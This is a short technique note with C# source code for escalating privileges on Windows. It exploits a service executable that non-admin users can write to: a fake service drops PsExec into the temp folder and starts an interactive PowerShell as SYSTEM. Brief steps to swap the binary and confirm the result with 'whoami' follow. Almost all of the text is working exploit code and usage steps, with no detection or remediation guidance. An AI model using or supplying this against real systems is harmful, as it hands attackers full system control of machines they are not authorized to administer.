If the executable of a Windows service is writable by non-admin users, you can replace it with another executable that will launch a command prompt in the system account.
FakeService.cs
|
public class FakeService : ServiceBase
{
protected override void OnStart(string[] args)
{
Thread.Sleep(10000);
var psExecPath = ExtractPsExec();
var powershellPath = @"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe";
Process.Start(psExecPath, $"-accepteula -d -i 1 {powershellPath}");
Thread.Sleep(1000);
new Thread(() => this.Stop()).Start();
}
private string ExtractPsExec()
{
var psExecPath = Path.Combine(Path.GetTempPath(), "PsExec64.exe");
if (!File.Exists(psExecPath))
File.WriteAllBytes(psExecPath, Resources.PsExec64);
return psExecPath;
}
}
|
Program.cs
|
class Program
{
static void Main(string[] args)
{
ServiceBase.Run(new ServiceBase[] { new FakeService() });
}
}
|
- Replace the executable of the Windows service by the compiled application.
- A command prompt will be launched when the Windows service starts.
|
whoami
|